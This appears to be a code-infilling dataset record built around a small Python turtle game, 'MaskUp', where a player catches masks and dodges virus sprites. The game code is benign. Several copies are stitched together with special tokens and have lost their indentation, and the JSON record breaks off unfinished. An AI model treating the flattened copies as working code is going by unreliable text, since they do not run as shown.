wn.register_shape('human.gif')
def game_loop():
score = 0
lives = 3
wn.register_shape('human.gif')
wn.register_shape('Evil-Virus.gif')
wn.register_shape('surgical-mask.gif')
player = turtle.Turtle()
player.speed(0)
player.shape('human.gif')
player.color('white')
player.penup()
player.goto(0, -250)
player.direction = 'stop'
good_guys = []
for _ in range(3):
good_guy = turtle.Turtle()
good_guy.speed(0)
good_guy.shape('surgical-mask.gif')
good_guy.color('blue')
good_guy.penup()
good_guy.goto(-100, 250)
good_guy.speed = random.uniform(0.3, 2.0)
good_guys.append(good_guy)
bad_guys = []
for _ in range(5):
bad_guy = turtle.Turtle()
bad_guy.speed(0)
bad_guy.shape('Evil-Virus.gif')
bad_guy.color('red')
bad_guy.penup()
bad_guy.goto(100, 250)
bad_guy.speed = random.uniform(0.3, 1.0)
bad_guys.append(bad_guy)
pen = turtle.Turtle()
pen.hideturtle()
pen.speed(0)
pen.shape('square')
pen.color('white')
pen.penup()
pen.goto(0, 260)
font = 'Courier', 24, 'normal'
pen.write('Score: {} Lives: {}'.format(score, lives), align='center',
font=font)
def show_message(score):
message = turtle.Turtle()
message.hideturtle()
message.speed(0)
message.color('yellow')
message.penup()
message.goto(0, 0)
font = 'Calibri', 24, 'bold'
message.write(
'GAME OVER: TOO MUCH EXPOSURE TO VIRUS\n Score: {}\n!MASK UP and STAY SAFE!'
.format(score), align='center', font=font)
def go_left():
player.direction = 'left'
def go_right():
player.direction = 'right'
def stop_player():
player.direction = 'stop'
wn.listen()
wn.onkeypress(go_left, 'Left')
wn.onkeyrelease(stop_player, 'Left')
wn.onkeypress(go_right, 'Right')
wn.onkeyrelease(stop_player, 'Right')
while True:
wn.update()
if player.direction == 'left':
x = player.xcor()
if x > -365:
x -= 0.8
player.setx(x)
if player.direction == 'right':
x = player.xcor()
if x < 365:
x += 0.8
player.setx(x)
for good_guy in good_guys:
y = good_guy.ycor()
y -= good_guy.speed
good_guy.sety(y)
if y < -300:
x = random.randint(-380, 380)
y = random.randint(300, 400)
good_guy.goto(x, y)
if good_guy.distance(player) < 40:
x = random.randint(-380, 380)
y = random.randint(300, 400)
good_guy.goto(x, y)
score += 10
pen.clear()
pen.write('Score: {} Lives: {}'.format(score, lives), align
='center', font=font)
winsound.PlaySound('video_game_retro_8bit_coin', winsound.
SND_FILENAME)
for bad_guy in bad_guys:
y = bad_guy.ycor()
y -= bad_guy.speed
bad_guy.sety(y)
if y < -300:
x = random.randint(-380, 380)
y = random.randint(300, 400)
bad_guy.goto(x, y)
if bad_guy.distance(player) < 40:
x = random.randint(-380, 380)
y = random.randint(300, 400)
bad_guy.goto(x, y)
score -= 10
lives -= 1
pen.clear()
pen.write('Score: {} Lives: {}'.format(score, lives), align
='center', font=font)
winsound.PlaySound('arcade_game_alarm_short', winsound.
SND_FILENAME)
if lives <= 0:
pen.clear()
bad_guy.clear()
good_guy.clear()
show_message(score)
winsound.PlaySound('game_over_sound', winsound.SND_FILENAME)
break
while True:
wn.update()
wn.bgpic('retro_city.gif')
winsound.PlaySound('retro_video_game_music-trimmed', winsound.SND_LOOP)
game_loop()
turtle.Screen().clear()
wn = turtle.Screen()
wn.title('MaskUp')
wn.bgcolor('green')
wn.bgpic('retro_city_title_page.gif')
wn.setup(width=800, height=600)
wn.tracer(0)
wn.mainloop()
<|reserved_special_token_1|>
import turtle
import random
import winsound
import sys
<|reserved_special_token_0|>
wn = turtle.Screen()
wn.title('MaskUp')
wn.bgcolor('green')
wn.bgpic('retro_city_title_page.gif')
wn.setup(width=800, height=600)
wn.tracer(0)
wn.register_shape('human.gif')
def game_loop():
score = 0
lives = 3
wn.register_shape('human.gif')
wn.register_shape('Evil-Virus.gif')
wn.register_shape('surgical-mask.gif')
player = turtle.Turtle()
player.speed(0)
player.shape('human.gif')
player.color('white')
player.penup()
player.goto(0, -250)
player.direction = 'stop'
good_guys = []
for _ in range(3):
good_guy = turtle.Turtle()
good_guy.speed(0)
good_guy.shape('surgical-mask.gif')
good_guy.color('blue')
good_guy.penup()
good_guy.goto(-100, 250)
good_guy.speed = random.uniform(0.3, 2.0)
good_guys.append(good_guy)
bad_guys = []
for _ in range(5):
bad_guy = turtle.Turtle()
bad_guy.speed(0)
bad_guy.shape('Evil-Virus.gif')
bad_guy.color('red')
bad_guy.penup()
bad_guy.goto(100, 250)
bad_guy.speed = random.uniform(0.3, 1.0)
bad_guys.append(bad_guy)
pen = turtle.Turtle()
pen.hideturtle()
pen.speed(0)
pen.shape('square')
pen.color('white')
pen.penup()
pen.goto(0, 260)
font = 'Courier', 24, 'normal'
pen.write('Score: {} Lives: {}'.format(score, lives), align='center',
font=font)
def show_message(score):
message = turtle.Turtle()
message.hideturtle()
message.speed(0)
message.color('yellow')
message.penup()
message.goto(0, 0)
font = 'Calibri', 24, 'bold'
message.write(
'GAME OVER: TOO MUCH EXPOSURE TO VIRUS\n Score: {}\n!MASK UP and STAY SAFE!'
.format(score), align='center', font=font)
def go_left():
player.direction = 'left'
def go_right():
player.direction = 'right'
def stop_player():
player.direction = 'stop'
wn.listen()
wn.onkeypress(go_left, 'Left')
wn.onkeyrelease(stop_player, 'Left')
wn.onkeypress(go_right, 'Right')
wn.onkeyrelease(stop_player, 'Right')
while True:
wn.update()
if player.direction == 'left':
x = player.xcor()
if x > -365:
x -= 0.8
player.setx(x)
if player.direction == 'right':
x = player.xcor()
if x < 365:
x += 0.8
player.setx(x)
for good_guy in good_guys:
y = good_guy.ycor()
y -= good_guy.speed
good_guy.sety(y)
if y < -300:
x = random.randint(-380, 380)
y = random.randint(300, 400)
good_guy.goto(x, y)
if good_guy.distance(player) < 40:
x = random.randint(-380, 380)
y = random.randint(300, 400)
good_guy.goto(x, y)
score += 10
pen.clear()
pen.write('Score: {} Lives: {}'.format(score, lives), align
='center', font=font)
winsound.PlaySound('video_game_retro_8bit_coin', winsound.
SND_FILENAME)
for bad_guy in bad_guys:
y = bad_guy.ycor()
y -= bad_guy.speed
bad_guy.sety(y)
if y < -300:
x = random.randint(-380, 380)
y = random.randint(300, 400)
bad_guy.goto(x, y)
if bad_guy.distance(player) < 40:
x = random.randint(-380, 380)
y = random.randint(300, 400)
bad_guy.goto(x, y)
score -= 10
lives -= 1
pen.clear()
pen.write('Score: {} Lives: {}'.format(score, lives), align
='center', font=font)
winsound.PlaySound('arcade_game_alarm_short', winsound.
SND_FILENAME)
if lives <= 0:
pen.clear()
bad_guy.clear()
good_guy.clear()
show_message(score)
winsound.PlaySound('game_over_sound', winsound.SND_FILENAME)
break
while True:
wn.update()
wn.bgpic('retro_city.gif')
winsound.PlaySound('retro_video_game_music-trimmed', winsound.SND_LOOP)
game_loop()
turtle.Screen().clear()
wn = turtle.Screen()
wn.title('MaskUp')
wn.bgcolor('green')
wn.bgpic('retro_city_title_page.gif')
wn.setup(width=800, height=600)
wn.tracer(0)
wn.mainloop()
<|reserved_special_token_1|>
import turtle
import random
import winsound
import sys
""" new_game = False
def toggle_new_game():
global new_game
if new_game == False:
new_game = True
else:
new_game = False """
# Module-level screen setup: create the main window and show the title page.
wn = turtle.Screen()
wn.title("MaskUp")
wn.bgcolor("green")
# Title-screen backdrop; swapped for the in-game backdrop once play starts.
wn.bgpic("retro_city_title_page.gif")
wn.setup(width=800, height=600)
# Disable automatic screen refreshes; the game loop calls wn.update() itself.
wn.tracer(0)
# Register the custom GIF so turtles can use it as a shape on this screen.
wn.register_shape("human.gif")
def game_loop():
    """Run one full round of the game.

    Creates the player, mask (good) and virus (bad) sprites, binds the
    arrow keys, then drives the frame loop until the player runs out of
    lives.  Returns when the round is over so the caller can reset the
    screen and start a new round.  Uses the module-level screen ``wn``.
    """
    score = 0
    lives = 3
    # Shapes must be registered on this screen before turtles can use them.
    wn.register_shape("human.gif")
    wn.register_shape("Evil-Virus.gif")
    wn.register_shape("surgical-mask.gif")
    # Add the player
    player = turtle.Turtle()
    player.speed(0)
    player.shape("human.gif")
    player.color("white")
    player.penup()
    player.goto(0, -250)
    # Custom attribute driven by the key handlers bound below.
    player.direction = "stop"
    # Add the good guys (masks: +10 points on contact)
    good_guys = []
    for _ in range(3):
        good_guy = turtle.Turtle()
        good_guy.speed(0)
        good_guy.shape("surgical-mask.gif")
        good_guy.color("blue")
        good_guy.penup()
        good_guy.goto(-100, 250)
        # NOTE: this overwrites the turtle's speed() method with a float;
        # it works because the loop below only ever reads the attribute.
        good_guy.speed = random.uniform(0.3, 2.0)
        good_guys.append(good_guy)
    # Add the bad guys (viruses: -10 points and -1 life on contact)
    bad_guys = []
    for _ in range(5):
        bad_guy = turtle.Turtle()
        bad_guy.speed(0)
        bad_guy.shape("Evil-Virus.gif")
        bad_guy.color("red")
        bad_guy.penup()
        bad_guy.goto(100, 250)
        bad_guy.speed = random.uniform(0.3, 1.0)
        bad_guys.append(bad_guy)
    # Make the pen that draws the score/lives HUD at the top of the screen
    pen = turtle.Turtle()
    pen.hideturtle()
    pen.speed(0)
    pen.shape("square")
    pen.color("white")
    pen.penup()
    pen.goto(0, 260)
    font = ("Courier", 24, "normal")
    pen.write("Score: {} Lives: {}".format(score, lives), align="center", font=font)

    def show_message(score):
        """Draw the game-over banner with the final score."""
        message = turtle.Turtle()
        message.hideturtle()
        message.speed(0)
        message.color("yellow")
        message.penup()
        message.goto(0, 0)
        font = ("Calibri", 24, "bold")
        message.write("GAME OVER: TOO MUCH EXPOSURE TO VIRUS\n Score: {}\n!MASK UP and STAY SAFE!".format(score), align="center", font=font)

    # Key handlers: set the player's movement direction.
    def go_left():
        player.direction = "left"

    def go_right():
        player.direction = "right"

    def stop_player():
        player.direction = "stop"

    # Keyboard Binding
    wn.listen()
    wn.onkeypress(go_left, "Left")
    wn.onkeyrelease(stop_player, "Left")
    wn.onkeypress(go_right, "Right")
    wn.onkeyrelease(stop_player, "Right")
    while True:
        # Manual refresh (automatic refreshes were disabled with tracer(0)).
        wn.update()
        # Move the player, clamped to the window edges.
        if player.direction == "left":
            x = player.xcor()
            if x > -365:
                x -= 0.8
                player.setx(x)
        if player.direction == "right":
            x = player.xcor()
            if x < 365:
                x += 0.8
                player.setx(x)
        # Move the good guys
        for good_guy in good_guys:
            y = good_guy.ycor()
            y -= good_guy.speed
            good_guy.sety(y)
            # Respawn at a random spot above the screen once off the bottom.
            if y < -300:
                x = random.randint(-380, 380)
                y = random.randint(300, 400)
                good_guy.goto(x, y)
            # Collision with player: award points, respawn, update HUD.
            if good_guy.distance(player) < 40:
                x = random.randint(-380, 380)
                y = random.randint(300, 400)
                good_guy.goto(x, y)
                score += 10
                pen.clear()
                pen.write("Score: {} Lives: {}".format(score, lives), align="center", font=font)
                winsound.PlaySound("video_game_retro_8bit_coin", winsound.SND_FILENAME)
        # Move the bad guys
        for bad_guy in bad_guys:
            y = bad_guy.ycor()
            y -= bad_guy.speed
            bad_guy.sety(y)
            # Respawn at a random spot above the screen once off the bottom.
            if y < -300:
                x = random.randint(-380, 380)
                y = random.randint(300, 400)
                bad_guy.goto(x, y)
            # Collision with player: lose points and a life, respawn, update HUD.
            if bad_guy.distance(player) < 40:
                x = random.randint(-380, 380)
                y = random.randint(300, 400)
                bad_guy.goto(x, y)
                score -= 10
                lives -= 1
                pen.clear()
                pen.write("Score: {} Lives: {}".format(score, lives), align="center", font=font)
                winsound.PlaySound("arcade_game_alarm_short", winsound.SND_FILENAME)
                if lives <= 0:
                    pen.clear()
                    bad_guy.clear()
                    good_guy.clear()
                    show_message(score)
                    winsound.PlaySound("game_over_sound", winsound.SND_FILENAME)
                    # BUG FIX: the original used `break` here, which only
                    # exits the inner `for bad_guy` loop — the `while True`
                    # frame loop kept running forever and re-triggered the
                    # game-over sequence on every later collision.  `return`
                    # actually ends the round so the caller can restart.
                    return
# Outer loop: run rounds back-to-back, resetting the screen between them.
while True:
    wn.update()
    # Switch to the in-game backdrop and start the background music.
    wn.bgpic("retro_city.gif")
    # FIX: per the winsound docs, SND_LOOP must be combined with SND_ASYNC;
    # without it the call blocks and the loop flag is not honoured.
    winsound.PlaySound("retro_video_game_music-trimmed",
                       winsound.SND_LOOP | winsound.SND_ASYNC)
    # Drive one round of the game.
    game_loop()
    # Tear down and rebuild the screen to show the title page again.
    turtle.Screen().clear()
    wn = turtle.Screen()
    wn.title("MaskUp")
    wn.bgcolor("green")
    wn.bgpic("retro_city_title_page.gif")
    wn.setup(width=800, height=600)
    wn.tracer(0)
# NOTE(review): unreachable — the loop above never exits normally.
wn.mainloop()
|
flexible
|
{
"blob_id": "1593280a29b13461b13d8b2805d9ac53ce94c759",
"index": 2948,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwn.title('MaskUp')\nwn.bgcolor('green')\nwn.bgpic('retro_city_title_page.gif')\nwn.setup(width=800, height=600)\nwn.tracer(0)\nwn.register_shape('human.gif')\n\n\ndef game_loop():\n score = 0\n lives = 3\n wn.register_shape('human.gif')\n wn.register_shape('Evil-Virus.gif')\n wn.register_shape('surgical-mask.gif')\n player = turtle.Turtle()\n player.speed(0)\n player.shape('human.gif')\n player.color('white')\n player.penup()\n player.goto(0, -250)\n player.direction = 'stop'\n good_guys = []\n for _ in range(3):\n good_guy = turtle.Turtle()\n good_guy.speed(0)\n good_guy.shape('surgical-mask.gif')\n good_guy.color('blue')\n good_guy.penup()\n good_guy.goto(-100, 250)\n good_guy.speed = random.uniform(0.3, 2.0)\n good_guys.append(good_guy)\n bad_guys = []\n for _ in range(5):\n bad_guy = turtle.Turtle()\n bad_guy.speed(0)\n bad_guy.shape('Evil-Virus.gif')\n bad_guy.color('red')\n bad_guy.penup()\n bad_guy.goto(100, 250)\n bad_guy.speed = random.uniform(0.3, 1.0)\n bad_guys.append(bad_guy)\n pen = turtle.Turtle()\n pen.hideturtle()\n pen.speed(0)\n pen.shape('square')\n pen.color('white')\n pen.penup()\n pen.goto(0, 260)\n font = 'Courier', 24, 'normal'\n pen.write('Score: {} Lives: {}'.format(score, lives), align='center',\n font=font)\n\n def show_message(score):\n message = turtle.Turtle()\n message.hideturtle()\n message.speed(0)\n message.color('yellow')\n message.penup()\n message.goto(0, 0)\n font = 'Calibri', 24, 'bold'\n message.write(\n 'GAME OVER: TOO MUCH EXPOSURE TO VIRUS\\n Score: {}\\n!MASK UP and STAY SAFE!'\n .format(score), align='center', font=font)\n\n def go_left():\n player.direction = 'left'\n\n def go_right():\n player.direction = 'right'\n\n def stop_player():\n player.direction = 'stop'\n wn.listen()\n wn.onkeypress(go_left, 'Left')\n wn.onkeyrelease(stop_player, 'Left')\n wn.onkeypress(go_right, 'Right')\n wn.onkeyrelease(stop_player, 'Right')\n while True:\n wn.update()\n if player.direction == 'left':\n x = 
player.xcor()\n if x > -365:\n x -= 0.8\n player.setx(x)\n if player.direction == 'right':\n x = player.xcor()\n if x < 365:\n x += 0.8\n player.setx(x)\n for good_guy in good_guys:\n y = good_guy.ycor()\n y -= good_guy.speed\n good_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n if good_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n score += 10\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('video_game_retro_8bit_coin', winsound.\n SND_FILENAME)\n for bad_guy in bad_guys:\n y = bad_guy.ycor()\n y -= bad_guy.speed\n bad_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n if bad_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n score -= 10\n lives -= 1\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('arcade_game_alarm_short', winsound.\n SND_FILENAME)\n if lives <= 0:\n pen.clear()\n bad_guy.clear()\n good_guy.clear()\n show_message(score)\n winsound.PlaySound('game_over_sound', winsound.SND_FILENAME)\n break\n\n\nwhile True:\n wn.update()\n wn.bgpic('retro_city.gif')\n winsound.PlaySound('retro_video_game_music-trimmed', winsound.SND_LOOP)\n game_loop()\n turtle.Screen().clear()\n wn = turtle.Screen()\n wn.title('MaskUp')\n wn.bgcolor('green')\n wn.bgpic('retro_city_title_page.gif')\n wn.setup(width=800, height=600)\n wn.tracer(0)\nwn.mainloop()\n",
"step-3": "<mask token>\nwn = turtle.Screen()\nwn.title('MaskUp')\nwn.bgcolor('green')\nwn.bgpic('retro_city_title_page.gif')\nwn.setup(width=800, height=600)\nwn.tracer(0)\nwn.register_shape('human.gif')\n\n\ndef game_loop():\n score = 0\n lives = 3\n wn.register_shape('human.gif')\n wn.register_shape('Evil-Virus.gif')\n wn.register_shape('surgical-mask.gif')\n player = turtle.Turtle()\n player.speed(0)\n player.shape('human.gif')\n player.color('white')\n player.penup()\n player.goto(0, -250)\n player.direction = 'stop'\n good_guys = []\n for _ in range(3):\n good_guy = turtle.Turtle()\n good_guy.speed(0)\n good_guy.shape('surgical-mask.gif')\n good_guy.color('blue')\n good_guy.penup()\n good_guy.goto(-100, 250)\n good_guy.speed = random.uniform(0.3, 2.0)\n good_guys.append(good_guy)\n bad_guys = []\n for _ in range(5):\n bad_guy = turtle.Turtle()\n bad_guy.speed(0)\n bad_guy.shape('Evil-Virus.gif')\n bad_guy.color('red')\n bad_guy.penup()\n bad_guy.goto(100, 250)\n bad_guy.speed = random.uniform(0.3, 1.0)\n bad_guys.append(bad_guy)\n pen = turtle.Turtle()\n pen.hideturtle()\n pen.speed(0)\n pen.shape('square')\n pen.color('white')\n pen.penup()\n pen.goto(0, 260)\n font = 'Courier', 24, 'normal'\n pen.write('Score: {} Lives: {}'.format(score, lives), align='center',\n font=font)\n\n def show_message(score):\n message = turtle.Turtle()\n message.hideturtle()\n message.speed(0)\n message.color('yellow')\n message.penup()\n message.goto(0, 0)\n font = 'Calibri', 24, 'bold'\n message.write(\n 'GAME OVER: TOO MUCH EXPOSURE TO VIRUS\\n Score: {}\\n!MASK UP and STAY SAFE!'\n .format(score), align='center', font=font)\n\n def go_left():\n player.direction = 'left'\n\n def go_right():\n player.direction = 'right'\n\n def stop_player():\n player.direction = 'stop'\n wn.listen()\n wn.onkeypress(go_left, 'Left')\n wn.onkeyrelease(stop_player, 'Left')\n wn.onkeypress(go_right, 'Right')\n wn.onkeyrelease(stop_player, 'Right')\n while True:\n wn.update()\n if player.direction 
== 'left':\n x = player.xcor()\n if x > -365:\n x -= 0.8\n player.setx(x)\n if player.direction == 'right':\n x = player.xcor()\n if x < 365:\n x += 0.8\n player.setx(x)\n for good_guy in good_guys:\n y = good_guy.ycor()\n y -= good_guy.speed\n good_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n if good_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n score += 10\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('video_game_retro_8bit_coin', winsound.\n SND_FILENAME)\n for bad_guy in bad_guys:\n y = bad_guy.ycor()\n y -= bad_guy.speed\n bad_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n if bad_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n score -= 10\n lives -= 1\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('arcade_game_alarm_short', winsound.\n SND_FILENAME)\n if lives <= 0:\n pen.clear()\n bad_guy.clear()\n good_guy.clear()\n show_message(score)\n winsound.PlaySound('game_over_sound', winsound.SND_FILENAME)\n break\n\n\nwhile True:\n wn.update()\n wn.bgpic('retro_city.gif')\n winsound.PlaySound('retro_video_game_music-trimmed', winsound.SND_LOOP)\n game_loop()\n turtle.Screen().clear()\n wn = turtle.Screen()\n wn.title('MaskUp')\n wn.bgcolor('green')\n wn.bgpic('retro_city_title_page.gif')\n wn.setup(width=800, height=600)\n wn.tracer(0)\nwn.mainloop()\n",
"step-4": "import turtle\nimport random\nimport winsound\nimport sys\n<mask token>\nwn = turtle.Screen()\nwn.title('MaskUp')\nwn.bgcolor('green')\nwn.bgpic('retro_city_title_page.gif')\nwn.setup(width=800, height=600)\nwn.tracer(0)\nwn.register_shape('human.gif')\n\n\ndef game_loop():\n score = 0\n lives = 3\n wn.register_shape('human.gif')\n wn.register_shape('Evil-Virus.gif')\n wn.register_shape('surgical-mask.gif')\n player = turtle.Turtle()\n player.speed(0)\n player.shape('human.gif')\n player.color('white')\n player.penup()\n player.goto(0, -250)\n player.direction = 'stop'\n good_guys = []\n for _ in range(3):\n good_guy = turtle.Turtle()\n good_guy.speed(0)\n good_guy.shape('surgical-mask.gif')\n good_guy.color('blue')\n good_guy.penup()\n good_guy.goto(-100, 250)\n good_guy.speed = random.uniform(0.3, 2.0)\n good_guys.append(good_guy)\n bad_guys = []\n for _ in range(5):\n bad_guy = turtle.Turtle()\n bad_guy.speed(0)\n bad_guy.shape('Evil-Virus.gif')\n bad_guy.color('red')\n bad_guy.penup()\n bad_guy.goto(100, 250)\n bad_guy.speed = random.uniform(0.3, 1.0)\n bad_guys.append(bad_guy)\n pen = turtle.Turtle()\n pen.hideturtle()\n pen.speed(0)\n pen.shape('square')\n pen.color('white')\n pen.penup()\n pen.goto(0, 260)\n font = 'Courier', 24, 'normal'\n pen.write('Score: {} Lives: {}'.format(score, lives), align='center',\n font=font)\n\n def show_message(score):\n message = turtle.Turtle()\n message.hideturtle()\n message.speed(0)\n message.color('yellow')\n message.penup()\n message.goto(0, 0)\n font = 'Calibri', 24, 'bold'\n message.write(\n 'GAME OVER: TOO MUCH EXPOSURE TO VIRUS\\n Score: {}\\n!MASK UP and STAY SAFE!'\n .format(score), align='center', font=font)\n\n def go_left():\n player.direction = 'left'\n\n def go_right():\n player.direction = 'right'\n\n def stop_player():\n player.direction = 'stop'\n wn.listen()\n wn.onkeypress(go_left, 'Left')\n wn.onkeyrelease(stop_player, 'Left')\n wn.onkeypress(go_right, 'Right')\n wn.onkeyrelease(stop_player, 
'Right')\n while True:\n wn.update()\n if player.direction == 'left':\n x = player.xcor()\n if x > -365:\n x -= 0.8\n player.setx(x)\n if player.direction == 'right':\n x = player.xcor()\n if x < 365:\n x += 0.8\n player.setx(x)\n for good_guy in good_guys:\n y = good_guy.ycor()\n y -= good_guy.speed\n good_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n if good_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n score += 10\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('video_game_retro_8bit_coin', winsound.\n SND_FILENAME)\n for bad_guy in bad_guys:\n y = bad_guy.ycor()\n y -= bad_guy.speed\n bad_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n if bad_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n score -= 10\n lives -= 1\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('arcade_game_alarm_short', winsound.\n SND_FILENAME)\n if lives <= 0:\n pen.clear()\n bad_guy.clear()\n good_guy.clear()\n show_message(score)\n winsound.PlaySound('game_over_sound', winsound.SND_FILENAME)\n break\n\n\nwhile True:\n wn.update()\n wn.bgpic('retro_city.gif')\n winsound.PlaySound('retro_video_game_music-trimmed', winsound.SND_LOOP)\n game_loop()\n turtle.Screen().clear()\n wn = turtle.Screen()\n wn.title('MaskUp')\n wn.bgcolor('green')\n wn.bgpic('retro_city_title_page.gif')\n wn.setup(width=800, height=600)\n wn.tracer(0)\nwn.mainloop()\n",
"step-5": "\r\nimport turtle\r\nimport random\r\nimport winsound\r\nimport sys\r\n\r\n\r\n\r\n\"\"\" new_game = False\r\n\r\ndef toggle_new_game():\r\n global new_game\r\n if new_game == False:\r\n new_game = True\r\n else:\r\n new_game = False \"\"\"\r\n\r\nwn = turtle.Screen()\r\nwn.title(\"MaskUp\")\r\nwn.bgcolor(\"green\")\r\nwn.bgpic(\"retro_city_title_page.gif\")\r\nwn.setup(width=800, height=600)\r\nwn.tracer(0)\r\nwn.register_shape(\"human.gif\")\r\n\r\n\r\ndef game_loop():\r\n score = 0\r\n lives = 3\r\n\r\n wn.register_shape(\"human.gif\")\r\n wn.register_shape(\"Evil-Virus.gif\")\r\n wn.register_shape(\"surgical-mask.gif\")\r\n\r\n # Add the player\r\n player = turtle.Turtle()\r\n player.speed(0)\r\n player.shape(\"human.gif\")\r\n player.color(\"white\")\r\n player.penup()\r\n player.goto(0, -250)\r\n player.direction = \"stop\"\r\n\r\n\r\n # Create a list of good guys\r\n good_guys = []\r\n\r\n # Add the good_guys\r\n for _ in range(3):\r\n good_guy = turtle.Turtle()\r\n good_guy.speed(0)\r\n good_guy.shape(\"surgical-mask.gif\")\r\n good_guy.color(\"blue\")\r\n good_guy.penup()\r\n good_guy.goto(-100, 250)\r\n good_guy.speed = random.uniform(0.3, 2.0)\r\n good_guys.append(good_guy)\r\n\r\n # Create a list of bad guys\r\n bad_guys = []\r\n\r\n # Add the bad_guys\r\n for _ in range(5):\r\n bad_guy = turtle.Turtle()\r\n bad_guy.speed(0)\r\n bad_guy.shape(\"Evil-Virus.gif\")\r\n bad_guy.color(\"red\")\r\n bad_guy.penup()\r\n bad_guy.goto(100, 250)\r\n bad_guy.speed = random.uniform(0.3, 1.0)\r\n bad_guys.append(bad_guy)\r\n\r\n \r\n # Make the pen\r\n pen = turtle.Turtle()\r\n pen.hideturtle()\r\n pen.speed(0)\r\n pen.shape(\"square\")\r\n pen.color(\"white\")\r\n pen.penup()\r\n pen.goto(0, 260)\r\n font = (\"Courier\", 24, \"normal\")\r\n pen.write(\"Score: {} Lives: {}\".format(score, lives), align=\"center\", font=font)\r\n\r\n # Make the message\r\n def show_message(score):\r\n message = turtle.Turtle()\r\n message.hideturtle()\r\n 
message.speed(0)\r\n message.color(\"yellow\")\r\n message.penup()\r\n message.goto(0, 0)\r\n font = (\"Calibri\", 24, \"bold\")\r\n message.write(\"GAME OVER: TOO MUCH EXPOSURE TO VIRUS\\n Score: {}\\n!MASK UP and STAY SAFE!\".format(score), align=\"center\", font=font) \r\n\r\n # Functions\r\n def go_left():\r\n player.direction = \"left\"\r\n\r\n def go_right():\r\n player.direction = \"right\"\r\n\r\n def stop_player():\r\n player.direction = \"stop\"\r\n\r\n # Keyboard Binding\r\n wn.listen()\r\n wn.onkeypress(go_left, \"Left\")\r\n wn.onkeyrelease(stop_player, \"Left\")\r\n wn.onkeypress(go_right, \"Right\")\r\n wn.onkeyrelease(stop_player, \"Right\")\r\n\r\n\r\n \r\n while True:\r\n # Update screen\r\n wn.update()\r\n\r\n # Move the player\r\n if player.direction == \"left\":\r\n x = player.xcor()\r\n if x > -365:\r\n x -= 0.8\r\n player.setx(x)\r\n \r\n if player.direction == \"right\":\r\n x = player.xcor()\r\n if x < 365:\r\n x += 0.8\r\n player.setx(x)\r\n\r\n # Move the good guys\r\n for good_guy in good_guys:\r\n y = good_guy.ycor()\r\n y -= good_guy.speed\r\n good_guy.sety(y)\r\n\r\n # Check if off the screen\r\n if y < -300:\r\n x = random.randint(-380, 380)\r\n y = random.randint(300, 400)\r\n good_guy.goto(x, y)\r\n\r\n # Check for a collision with player\r\n if good_guy.distance(player) < 40:\r\n x = random.randint(-380, 380)\r\n y = random.randint(300, 400)\r\n good_guy.goto(x, y)\r\n score += 10\r\n pen.clear()\r\n pen.write(\"Score: {} Lives: {}\".format(score, lives), align=\"center\", font=font)\r\n winsound.PlaySound(\"video_game_retro_8bit_coin\", winsound.SND_FILENAME)\r\n \r\n # Move the bad guys\r\n for bad_guy in bad_guys:\r\n y = bad_guy.ycor()\r\n y -= bad_guy.speed\r\n bad_guy.sety(y)\r\n\r\n # Check if off the screen\r\n if y < -300:\r\n x = random.randint(-380, 380)\r\n y = random.randint(300, 400)\r\n bad_guy.goto(x, y)\r\n\r\n # Check for a collision with player\r\n if bad_guy.distance(player) < 40:\r\n x = random.randint(-380, 
380)\r\n y = random.randint(300, 400)\r\n bad_guy.goto(x, y)\r\n score -= 10\r\n lives -= 1\r\n pen.clear()\r\n pen.write(\"Score: {} Lives: {}\".format(score, lives), align=\"center\", font=font)\r\n winsound.PlaySound(\"arcade_game_alarm_short\", winsound.SND_FILENAME)\r\n\r\n if lives <= 0:\r\n pen.clear()\r\n bad_guy.clear()\r\n good_guy.clear()\r\n show_message(score)\r\n winsound.PlaySound(\"game_over_sound\", winsound.SND_FILENAME)\r\n # wn.listen()\r\n # if wn.onkeypress(toggle_new_game, \"a\"):\r\n # if new_game == True:\r\n break\r\n # wn.onkeypress(sys.exit(), \"q\")\r\n\r\nwhile True:\r\n # Update screen\r\n wn.update()\r\n\r\n # Play music\r\n wn.bgpic(\"retro_city.gif\")\r\n winsound.PlaySound(\"retro_video_game_music-trimmed\", winsound.SND_LOOP)\r\n game_loop()\r\n turtle.Screen().clear()\r\n \r\n wn = turtle.Screen()\r\n wn.title(\"MaskUp\")\r\n wn.bgcolor(\"green\")\r\n wn.bgpic(\"retro_city_title_page.gif\")\r\n wn.setup(width=800, height=600)\r\n wn.tracer(0)\r\n\r\n #sys.exit()\r\n \r\n \r\n \r\n \r\n\r\n\r\nwn.mainloop()",
"step-ids": [
